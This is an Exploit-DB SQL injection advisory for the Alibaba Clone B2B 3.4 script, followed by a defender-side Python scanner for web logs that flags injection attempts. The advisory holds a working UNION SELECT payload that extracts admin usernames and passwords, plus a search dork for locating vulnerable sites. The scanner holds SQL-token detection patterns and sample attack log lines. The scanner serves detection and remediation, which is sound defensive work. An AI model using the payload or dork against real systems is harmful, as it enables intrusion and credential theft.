Alibaba Clone B2B 3.4 – SQL Injection

  • Author: Dr.0rYX & Cr3W-DZ
    Date: 2010-12-01
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/15650/
  • Exploit Title: Alibaba v3.4 clone b2b (countrydetails.php) SQL Injection Vulnerability
    Date: 29.11.2010
    Author: Dr.0rYX and Cr3w-DZ
    Category: webapps/0day
    ***************************************************************************************************
    *Pr!v8 Expl0iT AND t00l ** *
    *ALGERIAN HACKERS*
    *********************************- NORTH-AFRICA SECURITY TEAM -*************************************
    [!] Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability 
    [!] Author: Dr.0rYX and Cr3w-DZ
    [!] MAIL: sniper-dz@hotmail.de & Cr3w@hotmail.de
     
    ***************************************************************************/
    [!] notice :
     Dr.0rYX: MY OLD EMAIL VX3@HOTMAIL.DE CLOSED
     MY NEW EMAIL IS SNIPER-DZ@HOTMAIL.DE
    
    ***************************************************************************/
    
    [ Software Information ]
     
    [+] Vendor : http://www.alibabaclone.com/
    [+] script : Alibaba v3.4 clone b2b 
    [+] Download : http://www.alibabaclone.com/ (sell script )
    [+] Vulnerability : SQL injection
    [+] Dork : inurl:"countrydetails.php?es_id="
    
    **************************************************************************/
    
    [ Vulnerable File ]
    
    http://server/countrydetails.php?es_id=sql[N.A.S.T ]
    
    [ Exploit ]
    
    http://server/countrydetails.php?es_id=-1+UNION+ALL+select+1,Group_concat(CONVERT(es_id USING utf8),0x3a,CONVERT(es_admin_name USING utf8),0x3a,CONVERT(es_pwd USING utf8)),3,4+from+esb2b_admin--
    
    [GReet ]
    
    [+] : evilzone.org , exploit-db.com ,Inj3ct0r 1337 Exploit DataBase 1337db.com , ALL HACKERS MUSLIMS
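
A defender-side check for the flaw described above, as an added example that is not part of the original advisory: it scans web access logs for requests to countrydetails.php whose es_id is not a plain integer. The combined log format, the integer-only rule for es_id, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate es_id is a plain non-negative integer.
VALID_ID_RE = re.compile(r'\d{1,10}')
# SQL tokens that raise a non-numeric value from "malformed" to "sqli".
SQL_TOKENS_RE = re.compile(
    r'\b(union|select|from|group_concat|convert|sleep|benchmark)\b|--|/\*|0x[0-9a-f]+', re.I)

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Dec/2010:10:00:00 +0000] "GET /countrydetails.php?es_id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Dec/2010:10:00:05 +0000] "GET /countrydetails.php?es_id=-1+UNION+ALL+select+1,2,3,4-- HTTP/1.1" 200 812 "-" "-"',
    '203.0.113.9 - - [01/Dec/2010:10:00:09 +0000] "GET /countrydetails.php?es_id=12%27 HTTP/1.1" 500 0 "-" "-"',
    '198.51.100.4 - - [01/Dec/2010:10:01:00 +0000] "GET /index.php?es_id=abc HTTP/1.1" 200 100 "-" "-"',
]

def classify_es_id(value):
    """Return 'ok', 'malformed' or 'sqli' for one URL-decoded es_id value."""
    if VALID_ID_RE.fullmatch(value):
        return "ok"
    if SQL_TOKENS_RE.search(value):
        return "sqli"
    return "malformed"

def scan(lines):
    """Return (line_number, verdict, decoded_value) for suspicious countrydetails.php hits."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith("/countrydetails.php"):
            continue
        # parse_qs decodes %XX and '+'; keep_blank_values so an empty es_id is seen too.
        values = parse_qs(url.query, keep_blank_values=True).get("es_id", [])
        for value in values:
            verdict = classify_es_id(value)
            if verdict != "ok":
                findings.append((n, verdict, value))
        if len(values) > 1:  # repeated parameter: ambiguous which one the script reads
            findings.append((n, "duplicate-param", ",".join(values)))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule applies at the application boundary: rejecting any es_id that is not all digits before it reaches the query, and binding it as a parameter, removes the injection point rather than only detecting its use.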